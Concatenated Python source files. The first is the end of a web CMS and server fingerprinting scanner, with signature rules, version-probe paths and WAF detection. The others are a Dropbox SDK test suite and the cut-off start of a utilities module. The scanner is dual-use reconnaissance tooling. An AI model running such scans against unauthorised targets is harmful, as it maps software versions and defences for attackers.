{"body": ["Powered by <a href='http://www.pageadmin.net'"]}, {"body": ["/e/images/favicon.ico"]}]),
("Npoint", "http://www.npointhost.com/", "11/19/2013", [{"title": ["Powered by Npoint"]}]),
("小蚂蚁", "http://www.xiaomayi.co/", "11/19/2013",
[{"title": ["Powered by 小蚂蚁地方门户网站系统"]}, {"header": ["AntXiaouserslogin"]},
{"body": ["/Template/Ant/Css/AntHomeComm.css"]}]),
("捷点JCMS", "http://www.jcms.com.cn/", "11/19/2013", [{"body": ["Publish By JCms2010"]}]),
("帝国CMS", "http://www.phome.net/", "11/19/2013",
[{"title": ["Powered by EmpireCMS"]}, {"body": ["/skin/default/js/tabs.js"]},
{"body": ["/e/member/login/loginjs.php"]}]),
("phpMyadmin", "http://www.phpmyadmin.net/", "11/19/2013",
[{"header": ["Set-Cookie: phpMyAdmin="]}, {"title": ["phpMyAdmin "]}, {"body": ["pma_password"]}]),
("JEECMS", "http://www.jeecms.com/", "11/19/2013",
[{"title": ["Powered by JEECMS"]}, {"body": ["Powered by", "http://www.jeecms.com", "JEECMS"]},
{"body": ["/r/cms/www/", "jhtml"]}]),
("IdeaWebServer", "#", "6/4/2015 00:37:30", [{"header": ["IdeaWebServer"]}]),
("Struts2", "http://struts.apache.org/", "6/4/2015",
[{"header": ["JSESSIONID"], "body": [".action"]}, {"body": ["Struts Problem Report"]},
{"body": ["There is no Action mapped for namespace"]},
{"body": ["No result defined for action and result input"]}]),
("AXIS 2120网络摄像头", "http://www.axis.com/cn/zh-hans/products/axis-2120", "6/8/2015 16:13:02",
[{"title": ["AXIS 2120 Network Camera"]}]),
("东方通中间件", "http://www.tongtech.com/", "6/12/2015", [{"header": ["TongWeb Server"]}]),
("金蝶中间件Apusic", "http://www.apusic.com/", "6/12/2015", [{"header": ["Apusic"]}]),
("Ektron", "http://www.ektron.com", "21/12/2015", [{"body": ["id=\"Ektron"]}]),
# ("JQuery","http://jquery.com/","8/21/2014",[{"body":["jquery"]}]),
# ("JQuery-UI","http://jqueryui.com","9/4/2014",[{"body":["jquery-ui"]}]),
# ("bootstrap","http://getbootstrap.com/","8/21/2014",[{"body":["bootstrap.css"]},{"body":["bootstrap.min.css"]}]),
# ("google-analytics","http://www.google.com/analytics/","8/21/2014",[{"body":["google-analytics.com/ga.js"]},{"body":["google-analytics.com/analytics.js"]}]),
# ("__VIEWSTATE","http://msdn.microsoft.com/en-us/library/ms972976.aspx","10/4/2014",[{"body":["__VIEWSTATE"]}]),
# ("Angularjs","http://www.angularjs.org/","6/6/2015",[{"body":["angularjs"]}]),
# ("sogou站长平台","http://zhanzhang.sogou.com/","8/22/2014",[{"body":["sogou_site_verification"]}]),
# ("51la","http://www.51.la/","8/22/2014",[{"body":["js.users.51.la"]}]),
# ("baidu统计","http://tongji.baidu.com/","8/22/2014",[{"body":["hm.baidu.com/h.js"]}]),
# ("baidu站长平台","http://zhanzhang.baidu.com/?castk=LTE%3D","8/22/2014",[{"body":["baidu-site-verification"]}]),
# ("360站长平台","http://zhanzhang.so.com/","8/22/2014",[{"body":["360-site-verification"]}]),
# ("百度分享","http://share.baidu.com/","8/22/2014",[{"body":["share.baidu.com/static/api/js/share.js"]}]),
# ("squid","http://www.squid-cache.org/","8/28/2014",[{"header":["squid"]}]),
# ("CNZZ统计","http://cnzz.com","8/28/2014",[{"body":["cnzz.com/stat.php?id="]}]),
# ("安全宝","http://www.anquanbao.com/","8/28/2014",[{"header":["X-Powered-By-Anquanbao"]}]),
# ("360网站卫士","http://wangzhan.360.cn/","8/28/2014",[{"header":["360wzb"]}]),
# ("mod_wsgi","http://code.google.com/p/modwsgi","10/8/2014",[{"header":["mod_wsgi"]}]),
# ("mod_ssl","http://modssl.org","10/8/2014",[{"header":["mod_ssl"]}]),
# ("mod_rails","http://phusionpassenger.com","10/8/2014",[{"header":["mod_rails"]}]),
# ("mod_rack","http://phusionpassenger.com","10/8/2014",[{"header":["mod_rack"]}]),
# ("mod_python","http://www.modpython.org","10/8/2014",[{"header":["mod_python"]}]),
# ("mod_perl","http://perl.apache.org","10/8/2014",[{"header":["mod_perl"]}]),
# ("mod_jk","http://tomcat.apache.org/tomcat-3.3-doc/mod_jk-howto.html","10/8/2014",[{"header":["mod_jk"]}]),
# ("mod_fastcgi","http://www.fastcgi.com/mod_fastcgi/docs/mod_fastcgi.html","10/8/2014",[{"header":["mod_fastcgi"]}]),
# ("mod_auth_pam","http://pam.sourceforge.net/mod_auth_pam","10/8/2014",[{"header":["mod_auth_pam"]}]),
# ("百度云加速","http://yunjiasu.baidu.com/","8/28/2014",[{"header":["X-Server","fhl"]}]),
# ("加速乐","http://www.jiasule.com/","8/28/2014",[{"header":["__jsluid"]}]),
]
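# cmsver maps a fingerprint name from the fingers list above to a (probe_path, version_regex) pair.
# A probe_path of '/' means the version is extracted from the homepage response that was already
# fetched (body first, then headers); any other path is requested separately before matching.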
cmsver = {
"wordpress": ('/', r'<meta\s*name="generator"\s*content="WordPress\s*([\d\.]*)"\s/>'),
"Drupal": ('/CHANGELOG.txt', r'Drupal ([\d]+.[\d]+[.[\d]+]*, [\d]{4}-[\d]{2}-[\d]{2})'),
"Joomla": ('/modules/mod_login/mod_login.xml', r'<version>(.+)</version>'),
"IIS": ('/', r'Microsoft-IIS/([\d\.]+)'),
"Privoxy": ('/', r'Privoxy\s*([\w\.]+)'),
"ExtMail": ('/', r'ExtMail\s*Pro\s*([\w\.]+)'),
"GlassFish": ('/', r':\s*GlassFish\s*Server\s*Open\s*Source\s*Edition\s\s*([\w\.]+)'),
"qibosoft": ('/', r'>qibosoft\s*([\w\.]+)'),
"UcSTAR": ('/', r'">\S(V.*)</'),
"FineCMS": ('/', r'FineCMS\s*([\w\.]+)"\s*>'),
"Maticsoft_Shop_动软商城": ('/', r'Maticsoft\s*Shop\s*([\w\.]+)'),
"hishop": ('/', r'Hishop:\s*([\w\.]+)'),
"Tipask": ('/', r'"generator"\s*content="Tipask\s*([\w\.]+)'),
"地平线CMS": ('/', r'Powered\s*by\s*deepsoon\s*cms\s*version\s*([\w\.]+)\s'),
"BoyowCMS": ('/', r'BoyowCMS\s*([\w\.]+)'),
"mod_python": ('/', r'\s*mod_python\s*/([\w\.]+)\s'),
"mod_perl/1.22": ('/', r'mod_perl/([\w\.]+)'),
"mod_jk": ('/', r'mod_jk/([\w\.]+)'),
"mod_fastcgi": ('/', r'mod_perl/([\w\.]+)'),
"mod_auth_pam": ('/', r'mod_auth_pam/([\w\.]+)'),
"Communique": ('/', r'Communique/([\w\.]+)'),
"Z-BlogPHP": ('/', r'Z-BlogPHP\s*([\w\.]+)'),
"护卫神网站安全系统": ('/', r'<title>护卫神.网站安全系统(V.*)</title>'),
"Allegro-Software-RomPager": ('/', r'Allegro-Software-RomPager/([\w\.]+)'),
"HFS": ('/', r'Server:\s*HFS\s*(.*?)beta'),
"ecshop": ('/', r'ECSHOP\s*(.*?)\s*/>'),
"gunicorn": ('/', r'gunicorn/([\w\.]*)'),
"WebKnight": ('/', r'WebKnight/([\w\.]*)'),
"FortiWeb": ('/', r'FortiWeb-([\w\.]*)'),
"Mod_Security": ('/', r'Mod_Security\s*([\w\.]*)'),
"DnP Firewall": ('/', r'DnP\s*Firewall.*\s*([\w\.]+).*copy'),
"AnZuWAF": ('/', r'AnZuWAF/([\w\.]+)'),
"Safe3WAF": ('/', r'Safe3WAF/([\w\.]+)'),
"mod_auth_passthrough": ('/', r'mod_auth_passthrough/([\w\.]+)'),
"mod_bwlimited": ('/', r'mod_bwlimited/([\w\.]+)'),
"OpenSSL": ('/', r'OpenSSL/([\w\.]+)'),
"Alternate-Protocol": ('/', r'Alternate-Protocol:\s*npn-spdy/([\w\.]+)'),
"pagespeed": ('/', r'X-Mod-Pagespeed:\s*([\w\.]+)'),
"Cocoon": ('/', r'X-Cocoon-Version:\s*([\w\.]+)'),
"Kooboocms": ('/', r'X-KoobooCMS-Version:\s*([\w\.]+)'),
"plone": ('/', r'Plone/([\w\.]+)'),
"Powercdn": ('/', r'PowerCDN/([\w\.]+)\s*'),
"Iisexport": ('/', r'IIS\s*Export\s*([\w\.]+) '),
"DotNetNuke": ('/', r'DotNetNuke\s*Error:\s*-\s*Version(.*)</'),
"Aspnetmvc": ('/', r'X-AspNetMvc-Version:\s*([\w\.]+)'),
"perl": ('/', r'Perl/([\w\.]+)\s*'),
"jsp": ('/', r'JSP/([\w\.]+)\s*'),
"ruby": ('/', r'Ruby/([\w\.]+)\s*'),
"python": ('/', r'Python/([\w\.]+)\s*'),
"PHP": ('/', r'PHP/([\w\.]+)\s*'),
"JQuery-UI": ('/', r'jquery-ui-([\w\.]+)\s*'),
"zabbix": ('/', r'\s*Zabbix\s*([\w\.]+)*\sCopyright'),
"JBoss": ('/', r'JBoss-([\w\.]+)'),
"Oracle-Application-Server": ('/', r':\s*Oracle-Application-Server-10g/([\w\.]+)'),
"Jetty": ('/', r'Jetty/([\w\.]+)'),
"webrick": ('/', r'WEBrick/([\w\.]+)'),
"Phusion": ('/', r'Phusion\s*Passenger\s*([\w\.]+)'),
"Netscape-Enterprise": ('/', r':\s*Netscape-Enterprise/([\w\.]+)'),
"Resin": ('/', r'Resin/([\w\.]+)'),
"Zeus": ('/', r'Zeus/([\w\.]+)'),
"ngx_openresty": ('/', r'ngx_openresty/([\w\.]+)'),
"Microsoft-HTTPAPI": ('/', r''),
"Tengine": ('/', r'Tengine/([\w\.]+)'),
"Apache": ('/', r'Apache/([\w\.]+)'),
"Apache-Tomcat": ('/', r'Apache-Coyote/([\w\.]+)'),
"Nginx": ('/', r'Nginx/([\w\.]+)'),
"squid": ('/', r':\s*squid/([\w\.]+)'),
"ZendServer": ('/', r'ZendServer/([\w\.]+)'),
"Z-Blog": ('/', r'Z-Blog\s*([\w\.]+)'),
"Liferay": ('/', r''),
"fisheye": ('/', r'>FishEye\s*([\w\.]+)'),
"MDaemon": ('/', r'MDaemon\s*([\w\.]+)'),
"DouPHP": ('/', r'DouPHP\s*([\w\.]+)'),
"HDWiki": ('/', r'="*HDWiki\s*([\w\.]+)"'),
"ESPCMS": ('/', r'Powered\s*by\s*ESPCMS\s*([\w\.]+)'),
"Discuz": ('/', r'>Discuz!</a></strong>\s*<em>([\w\.]+)</em></p>'),
"vBulletin": ('/', r'="\s*vBulletin\s*([\w\.]+)"\s*/>'),
"cmseasy": ('/', r'"Generator"\s*content="CmsEasy\s*([\w\.]+)"\s*/>'),
"ASPCMS": ('/', r'content="ASPCMS!\s*([\w\.]+)"\s*'),
"MetInfo": ('/', r'MetInfo</b></a>\s*([\w\.]+)'),
"IdeaWebServer": ('/', r'Server:\s*IdeaWebServer/([\w\.]+)'),
"金蝶中间件Apusic": ('/', r'<TITLE>Apusic\s*Application\s*Server/([\w\.]+)'),
"天柏在线培训/考试系统": ('/Login.aspx', r'KSXTQYB-V(.*)</span>'),
"openEAP": ('/security/login/login.jsp', r'<p.*(open.*?)</'),
"phpwind": ('/robots.txt', r'Version\s*([\w\.]+)'),
"DedeCMS": ('/data/admin/ver.txt', r'(.*)'),
"Ektron": ('/Workarea/version.xml', r'<CMS400 DATE="[\d\-]+">([\w\.]+)</CMS400>\s*</installation>'),
}
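# Cmsfinger resolves each target to a URL, fetches it once, matches the response against every
# fingerprint rule above, and, when a matched product has an entry in cmsver, also tries to
# extract its version string before logging the result.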
class Cmsfinger(Tasker):
id = 0
lock = threading.RLock()
def __init__(self, resource):
Tasker.__init__(self, resource)
def taskprocesser(self, task):
Cmsfinger.lock.acquire()
Cmsfinger.id = Cmsfinger.id + 1
Cmsfinger.lock.release()
req = HttpSession()
if not req.Get(task):
return
result = {}
headers = str(req.headers)
for line in fingers:
allfingers = line[3]
for onefinger in allfingers:
bMatch = True
for key in onefinger:
if key == 'header':
for r in onefinger[key]:
if headers.find(r) < 0:
bMatch = False
break
if not bMatch:
break
if not bMatch:
break
if key == 'title' or key == 'body':
for r in onefinger[key]:
if req.html.find(r) < 0:
bMatch = False
break
if not bMatch:
break
if not bMatch:
break
if bMatch:
result[line[0]] = ''
break
for cms in result:
if cms in cmsver:
if cmsver[cms][0] == '/':
m = re.search(cmsver[cms][1], req.html)
if not m:
m = re.search(cmsver[cms][1], headers)
                    result[cms] = m.group(1) if m else 'unknown'
else:
tmpreq = HttpSession(task.strip('/') + cmsver[cms][0])
if tmpreq.Get():
m = re.search(cmsver[cms][1], tmpreq.html)
if not m:
m = re.search(cmsver[cms][1], str(tmpreq.headers))
                        result[cms] = m.group(1) if m else 'unknown'
if len(result) == 0:
Log.file('"unkown","%s"' % task, Log.YELLOW)
else:
Log.file('"%s","%s"' % (task, result))
def resolvetask(self, task):
if task[0:4] != 'http':
return ['http://' + task]
else:
return [task]
def help():
print('this.py www.baidu.com')
print('this.py -r domainlist.txt')
if __name__ == "__main__":
Log.INIT()
Log.FILE = sys.path[0] + '\\cms-finger-log.txt'
if len(sys.argv) == 1:
help()
elif len(sys.argv) == 2:
b = Cmsfinger([sys.argv[1]])
b.run()
elif len(sys.argv) == 3 and sys.argv[1] == '-r':
b = Cmsfinger(sys.argv[2])
b.run()
else:
help()
|
test_client.py
|
#!/usr/bin/env python
from __future__ import with_statement
from StringIO import StringIO
import unittest
import os
import posixpath
import sys
import threading
from uuid import UUID
from dropbox import session, client
import datetime
from dropbox.rest import ErrorResponse
try:
import json
except ImportError:
import simplejson as json
PY3 = sys.version_info[0] == 3
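# BaseClientTests carries the actual API tests; it is mixed into the OAuth1 and OAuth2 TestCase
# classes below, each of which provides its own _create_client() used by setUpClass().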
class BaseClientTests(object):
@classmethod
def setUpClass(cls):
"""Creates the API client and decides on a test directory."""
cls.client = cls._create_client()
cls.test_dir = "/" + datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
test_file_dir = os.path.join(os.path.dirname(__file__), "..", "testfiles")
test_file_dir = os.path.realpath(test_file_dir)
cls.foo = os.path.join(test_file_dir, "foo.txt")
cls.frog = os.path.join(test_file_dir, "Costa Rican Frog.jpg")
cls.song = os.path.join(test_file_dir, "dropbox_song.mp3")
@classmethod
def tearDownClass(cls):
cls.client.file_delete(cls.test_dir)
def setUp(self):
# Hack to run setUpClass() for Python 2.6.
# (It's not worth running tearDownClass(), so you'll have some
# garbage in your app folder.)
if not hasattr(self, 'client'):
self.setUpClass()
def upload_file(self, src, target, **kwargs):
with open(src, 'rb') as f:
return self.client.put_file(target, f, **kwargs)
def dict_has(self, dictionary, *args, **kwargs):
"""Convenience method to check if a dictionary contains the specified
keys and key-value pairs"""
for key in args:
self.assertTrue(key in dictionary)
for (key, value) in kwargs.items():
self.assertEqual(value, dictionary[key])
def assert_file(self, dictionary, filename, *args, **kwargs):
import os
defaults = dict(
bytes = os.path.getsize(filename),
is_dir = False
)
combined = dict(defaults.items() + kwargs.items())
self.dict_has(dictionary, *args,
**combined
)
def test_account_info(self):
"""Tests if the account_info returns the expected fields."""
account_info = self.client.account_info()
self.dict_has(account_info,
"country",
"display_name",
"referral_link",
"quota_info",
"uid"
)
def test_put_file(self):
"""Tests if put_file returns the expected metadata"""
def test_put(file, path):
file_path = posixpath.join(self.test_dir, path)
f = open(file, "rb")
metadata = self.client.put_file(file_path, f)
self.assert_file(metadata, file, path = file_path)
test_put(self.foo, "put_foo.txt")
test_put(self.song, "put_song.mp3")
test_put(self.frog, "put_frog.jpg")
def test_put_file_overwrite(self):
"""Tests if put_file with overwrite=true returns the expected metadata"""
path = posixpath.join(self.test_dir, "foo_overwrite.txt")
self.upload_file(self.foo, path)
f = StringIO("This Overwrites")
metadata = self.client.put_file(path, f, overwrite=True)
self.dict_has(metadata,
size = "15 bytes",
bytes = 15,
is_dir = False,
path = path,
mime_type = "text/plain"
)
def test_get_file(self):
"""Tests if storing and retrieving a file returns the same file"""
def test_get(file, path):
file_path = posixpath.join(self.test_dir, path)
self.upload_file(file, file_path)
downloaded = self.client.get_file(file_path).read()
local = open(file, "rb").read()
self.assertEqual(len(downloaded), len(local))
self.assertEqual(downloaded, local)
test_get(self.foo, "get_foo.txt")
test_get(self.frog, "get_frog.txt")
test_get(self.song, "get_song.txt")
def test_get_partial_file(self):
"""Tests if storing a file and retrieving part of it returns the correct part"""
def test_get(file, path, start_frac, download_frac):
file_path = posixpath.join(self.test_dir, path)
self.upload_file(file, file_path)
local = open(file, "rb").read()
local_len = len(local)
download_start = int(start_frac * local_len) if start_frac is not None else None
download_length = int(download_frac * local_len) if download_frac is not None else None
downloaded = self.client.get_file(file_path, start=download_start,
length=download_length).read()
local_file = open(file, "rb")
if download_start:
local_file.seek(download_start)
if download_length is None:
local_partial = local_file.read()
else:
local_partial = local_file.read(download_length)
elif download_length:
local_file.seek(-1 * download_length, 2)
local_partial = local_file.read(download_length)
self.assertEqual(len(downloaded), len(local_partial))
self.assertEqual(downloaded, local_partial)
test_get(self.foo, "get_foo.txt", 0.25, 0.5)
test_get(self.frog, "get_frog.txt", None, 0.5)
test_get(self.song, "get_song.txt", 0.25, None)
def test_metadata(self):
"""Tests if metadata returns the expected values for a files uploaded earlier"""
path = posixpath.join(self.test_dir, "foo_upload.txt")
self.upload_file(self.foo, path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path)
def test_metadata_bad(self):
"""Tests if metadata returns an error for nonexistent file"""
self.assertRaises(
ErrorResponse,
lambda: self.client.metadata(posixpath.join(self.test_dir, "foo_does_not_exist.txt"))
)
def test_create_folder(self):
"""Tests if creating a folder works"""
path = posixpath.join(self.test_dir, u"new_fold\xe9r")
metadata = self.client.file_create_folder(path)
self.dict_has(metadata,
size = "0 bytes",
bytes = 0,
is_dir = True,
path = path
)
def test_create_folder_dupe(self):
"""Tests if creating a folder fails correctly if one already exists"""
path = posixpath.join(self.test_dir, u"new_fold\xe9r_dupe")
metadata = self.client.file_create_folder(path)
self.assertRaises(
ErrorResponse,
lambda: self.client.file_create_folder(path)
)
def test_delete(self):
"""Tests if deleting a file really makes it disappear"""
path = posixpath.join(self.test_dir, u"d\xe9lfoo.txt")
self.upload_file(self.foo, path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path)
self.client.file_delete(path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo,
path = path,
bytes = 0,
size = "0 bytes",
is_deleted = True
)
def test_copy(self):
"""Tests copying a file, to ensure that two copies exist after the operation"""
path = posixpath.join(self.test_dir, "copyfoo.txt")
path2 = posixpath.join(self.test_dir, "copyfoo2.txt")
self.upload_file(self.foo, path)
self.client.file_copy(path, path2)
metadata = self.client.metadata(path)
metadata2 = self.client.metadata(path2)
self.assert_file(metadata, self.foo, path = path)
self.assert_file(metadata2, self.foo, path = path2)
def test_move(self):
"""Tests moving a file, to ensure the new copy exists and the old copy is removed"""
path = posixpath.join(self.test_dir, "movefoo.txt")
path2 = posixpath.join(self.test_dir, "movefoo2.txt")
self.upload_file(self.foo, path)
self.client.file_move(path, path2)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path, is_deleted = True, size = "0 bytes", bytes = 0)
metadata = self.client.metadata(path2)
self.assert_file(metadata, self.foo, path = path2)
def test_thumbnail(self):
path = posixpath.join(self.test_dir, "frog.jpeg")
orig_md = self.upload_file(self.frog, path)
path = orig_md['path']
modes = (
('xs', 32, 32),
('s', 64, 64),
('m', 128, 128),
('l', 640, 480),
('xl', 1024, 768),
)
for fmt in ('JPEG', 'PNG'):
prev_len = 0
for ident in ('xs', 's', 'm', 'l', 'xl'):
with self.client.thumbnail(path, ident, fmt) as r:
data1 = r.read()
r, md = self.client.thumbnail_and_metadata(path, ident, fmt)
with r:
data2 = r.read()
self.assertEquals(md, orig_md)
self.assertEquals(data1, data2)
# Make sure the amount of data returned increases as we increase the size.
self.assertTrue(len(data1) > prev_len)
prev_len = len(data1)
# Make sure the default is 'm'
with self.client.thumbnail(path, 'm') as r:
data_m = r.read()
with self.client.thumbnail(path) as r:
data1 = r.read()
r, md = self.client.thumbnail_and_metadata(path)
with r:
data2 = r.read()
self.assertEqual(data_m, data1)
self.assertEqual(data_m, data2)
def test_stream(self):
"""Tests file streaming using the /media endpoint"""
path = posixpath.join(self.test_dir, "stream_song.mp3")
self.upload_file(self.song, path)
link = self.client.media(path)
self.dict_has(link,
"url",
"expires"
)
def test_share(self):
"""Tests file streaming using the /media endpoint"""
path = posixpath.join(self.test_dir, "stream_song.mp3")
self.upload_file(self.song, path)
link = self.client.share(path)
self.dict_has(link,
"url",
"expires"
)
def test_search(self):
"""Tests searching for a file in a folder"""
path = posixpath.join(self.test_dir, "search/")
j = posixpath.join
self.upload_file(self.foo, j(path, "text.txt"))
self.upload_file(self.foo, j(path, u"t\xe9xt.txt"))
self.upload_file(self.foo, j(path, "subFolder/text.txt"))
self.upload_file(self.foo, j(path, "subFolder/cow.txt"))
self.upload_file(self.frog, j(path, "frog.jpg"))
self.upload_file(self.frog, j(path, "frog2.jpg"))
self.upload_file(self.frog, j(path, "subFolder/frog2.jpg"))
results = self.client.search(path, "sasdfasdf")
self.assertEquals(results, [])
results = self.client.search(path, "jpg")
self.assertEquals(len(results), 3)
for metadata in results:
self.assert_file(metadata, self.frog)
results = self.client.search(j(path, "subFolder"), "jpg")
self.assertEquals(len(results), 1)
self.assert_file(results[0], self.frog)
all_tex_files = {j(path, n) for n in ["text.txt", u"t\xe9xt.txt", "subFolder/text.txt"]}
results = self.client.search(path, "tex")
self.assertEquals({r["path"] for r in results}, all_tex_files)
results = self.client.search(path, u"t\xe9x")
self.assertEquals({r["path"] for r in results}, all_tex_files)
def test_revisions_restore(self):
"""Tests getting the old revisions of a file"""
path = posixpath.join(self.test_dir, "foo_revs.txt")
self.upload_file(self.foo, path)
self.upload_file(self.frog, path, overwrite = True)
self.upload_file(self.song, path, overwrite = True)
revs = self.client.revisions(path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.song, path = path, mime_type = "text/plain")
self.assertEquals(len(revs), 3)
self.assert_file(revs[0], self.song, path = path, mime_type = "text/plain")
self.assert_file(revs[1], self.frog, path = path, mime_type = "text/plain")
self.assert_file(revs[2], self.foo, path = path, mime_type = "text/plain")
metadata = self.client.restore(path, revs[2]["rev"])
self.assert_file(metadata, self.foo, path = path, mime_type = "text/plain")
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path, mime_type = "text/plain")
def test_copy_ref(self):
"""Tests using the /copy_ref endpoint to move data within a single dropbox"""
path = posixpath.join(self.test_dir, "foo_copy_ref.txt")
path2 = posixpath.join(self.test_dir, "foo_copy_ref_target.txt")
self.upload_file(self.foo, path)
copy_ref = self.client.create_copy_ref(path)
self.dict_has(copy_ref,
"expires",
"copy_ref"
)
self.client.add_copy_ref(copy_ref["copy_ref"], path2)
metadata = self.client.metadata(path2)
self.assert_file(metadata, self.foo, path = path2)
copied_foo = self.client.get_file(path2).read()
local_foo = open(self.foo, "rb").read()
self.assertEqual(len(copied_foo), len(local_foo))
self.assertEqual(copied_foo, local_foo)
def test_chunked_upload(self):
target_path = posixpath.join(self.test_dir, 'chunked_upload_file.txt')
chunk_size = 4 * 1024
random_string1, random_data1 = make_random_data(chunk_size)
random_string2, random_data2 = make_random_data(chunk_size)
new_offset, upload_id = self.client.upload_chunk(StringIO(random_string1), 0)
self.assertEquals(new_offset, chunk_size)
self.assertIsNotNone(upload_id)
new_offset, upload_id2 = self.client.upload_chunk(StringIO(random_string2), 0,
new_offset, upload_id)
self.assertEquals(new_offset, chunk_size * 2)
self.assertEquals(upload_id2, upload_id)
metadata = self.client.commit_chunked_upload('/auto' + target_path, upload_id,
overwrite=True)
self.dict_has(metadata, bytes=chunk_size * 2, path=target_path)
downloaded = self.client.get_file(target_path).read()
self.assertEquals(chunk_size * 2, len(downloaded))
self.assertEquals(random_data1, downloaded[:chunk_size])
self.assertEquals(random_data2, downloaded[chunk_size:])
def test_chunked_uploader(self):
path = posixpath.join(self.test_dir, "chunked_uploader_file.txt")
size = 10 * 1024 * 1024
chunk_size = 4 * 1024 * 1102
random_string, random_data = make_random_data(size)
uploader = self.client.get_chunked_uploader(StringIO(random_string), len(random_string))
error_count = 0
while uploader.offset < size and error_count < 5:
try:
upload = uploader.upload_chunked(chunk_size=chunk_size)
except ErrorResponse as e:
error_count += 1
uploader.finish(path)
downloaded = self.client.get_file(path).read()
self.assertEquals(size, len(downloaded))
self.assertEquals(random_data, downloaded)
def test_delta(self):
prefix = posixpath.join(self.test_dir, "delta")
a = posixpath.join(prefix, "a.txt")
self.upload_file(self.foo, a)
b = posixpath.join(prefix, "b.txt")
self.upload_file(self.foo, b)
c = posixpath.join(prefix, "c")
c_1 = posixpath.join(prefix, "c/1.txt")
self.upload_file(self.foo, c_1)
c_2 = posixpath.join(prefix, "c/2.txt")
self.upload_file(self.foo, c_2)
prefix_lc = prefix.lower()
c_lc = c.lower()
# /delta on everything
expected = { p.lower() for p in (prefix, a, b, c, c_1, c_2) }
entries = set()
cursor = None
while True:
r = self.client.delta(cursor)
if r['reset']: entries = set()
for path_lc, md in r['entries']:
if path_lc.startswith(prefix_lc+'/') or path_lc == prefix_lc:
assert md is not None, "we should never get deletes under 'prefix'"
entries.add(path_lc)
if not r['has_more']: break
cursor = r['cursor']
self.assertEqual(expected, entries)
# /delta where path_prefix=c
expected = { p.lower() for p in (c, c_1, c_2) }
entries = set()
cursor = None
while True:
r = self.client.delta(cursor, path_prefix=c)
if r['reset']: entries = set()
for path_lc, md in r['entries']:
assert path_lc.startswith(c_lc+'/') or path_lc == c_lc
assert md is not None, "we should never get deletes"
entries.add(path_lc)
if not r['has_more']: break
cursor = r['cursor']
self.assertEqual(expected, entries)
def test_longpoll_delta(self):
cursor = self.client.delta()['cursor']
def assert_longpoll():
r = self.client.longpoll_delta(cursor)
assert (r['changes'])
t = threading.Thread(target=assert_longpoll)
t.start()
self.upload_file(self.foo, posixpath.join(self.test_dir, "foo.txt"))
t.join()
def get_string_field(j, field_name):
if not j.has_key(field_name):
raise ValueError("missing field: %r" % (field_name,))
v = j[field_name]
if not isinstance(v, basestring):
raise ValueError("field %r: expecting string, but got %r" + (v,))
return v
oauth1_auth_info = None
oauth2_auth_info = None
load_oauth1_auth_info_result = None
load_oauth2_auth_info_result = None
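# Credentials for the live API tests are read from tests/oauth1.auth and tests/oauth2.auth;
# if a file is missing or malformed, the corresponding TestCase class is skipped.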
def unittest_skip(msg):
# Fake unittest.skip() for Python 2.6.
# This only works as a class decorator.
if hasattr(unittest, 'skip'):
return unittest.skip(msg)
else:
print(msg)
return lambda cls: object
def skip_if_missing_oauth1_auth_info():
global load_oauth1_auth_info_result, oauth1_auth_info
if load_oauth1_auth_info_result is None:
fn = "tests/oauth1.auth"
try:
with open(fn, 'r') as f:
j = json.load(f)
app_key = get_string_field(j, "app_key")
app_secret = get_string_field(j, "app_secret")
access_key = get_string_field(j, "access_key")
access_secret = get_string_field(j, "access_secret")
oauth1_auth_info = app_key, app_secret, access_key, access_secret
load_oauth1_auth_info_result = (True, "")
except Exception as e:
load_oauth1_auth_info_result = (False, "error reading \"%s\": %s" % (fn, e,))
loaded, msg = load_oauth1_auth_info_result
if loaded:
return lambda f: f
else:
return unittest_skip(msg)
def skip_if_missing_oauth2_auth_info():
global load_oauth2_auth_info_result, oauth2_auth_info
if load_oauth2_auth_info_result is None:
fn = "tests/oauth2.auth"
try:
with open(fn, 'r') as f:
j = json.load(f)
access_token = get_string_field(j, "access_token")
oauth2_auth_info = access_token
load_oauth2_auth_info_result = (True, "")
except Exception as e:
load_oauth2_auth_info_result = (False, "error reading \"%s\": %s" % (fn, e,))
loaded, msg = load_oauth2_auth_info_result
if loaded:
return lambda f: f
else:
return unittest_skip(msg)
#@unittest.skipIf(*load_oauth1_auth_info())
@skip_if_missing_oauth1_auth_info()
class TestClientOAuth1(BaseClientTests, unittest.TestCase):
@classmethod
def _create_client(cls):
app_key, app_secret, access_key, access_secret = oauth1_auth_info
sess = session.DropboxSession(app_key, app_secret)
sess.set_token(access_key, access_secret)
return client.DropboxClient(sess)
#@unittest.skipIf(*load_oauth2_auth_info())
@skip_if_missing_oauth2_auth_info()
class TestClientOAuth2(BaseClientTests, unittest.TestCase):
@classmethod
def _create_client(cls):
access_token = oauth2_auth_info
return client.DropboxClient(access_token)
class TestClient(unittest.TestCase):
def test_oauth2_token_format_check(self):
bad_tokens = [
'',
'=',
'=0123',
'!AZaz09-_./~+',
'AZaz09-_./~+=.',
'abcdefg\n',
'abcdefg\t',
'abcdefg ',
'abc\ndefg',
'abc\tdefg',
'abc defg',
'\nabcdefg',
'\tabcdefg',
' abcdefg',
]
good_tokens = [
'1=',
'1',
'abcdefg',
'AZaz09-_./~+',
'AZaz09-_./~+=',
'AZaz09-_./~+==============',
'.000000000000000000000000.',
]
for t in bad_tokens:
self.assertRaises(ValueError, client.DropboxClient, t)
for t in good_tokens:
client.DropboxClient(t)
def test_chunked_uploader_bad_token(self):
c = client.DropboxClient("abcdefg")
random_string, random_data = make_random_data(10 * 1024 * 1024)
chunk_size = 4 * 1024 * 1102
uploader = c.get_chunked_uploader(StringIO(random_string), len(random_string))
try:
uploader.upload_chunked(chunk_size=chunk_size)
assert False, "expected exception for bad token"
except ErrorResponse as e:
self.assertEqual(e.status, 401)
def make_random_data(size):
random_data = os.urandom(size)
if PY3:
random_string = random_data.decode('latin1')
else:
random_string = random_data
return random_string, random_data
|
__init__.py
|
from __future__ import annotations
from dataclasses import *
from typing import *
from collections import defaultdict
from datetime import datetime
import threading
from .serializer import Serializer, serializer, from_json, to_json # type: ignore
from .nub import nub # type: ignore
from .pp import show, pr, Color # type: ignore
from .profiling import timeit, memit # type: ignore
from .args import doc_header # type: ignore
import json
from urllib.request import urlopen
A = TypeVar('A')
B = TypeVar('B')
def curl(url: str) -> Any:
ten_minutes = 60 * 10
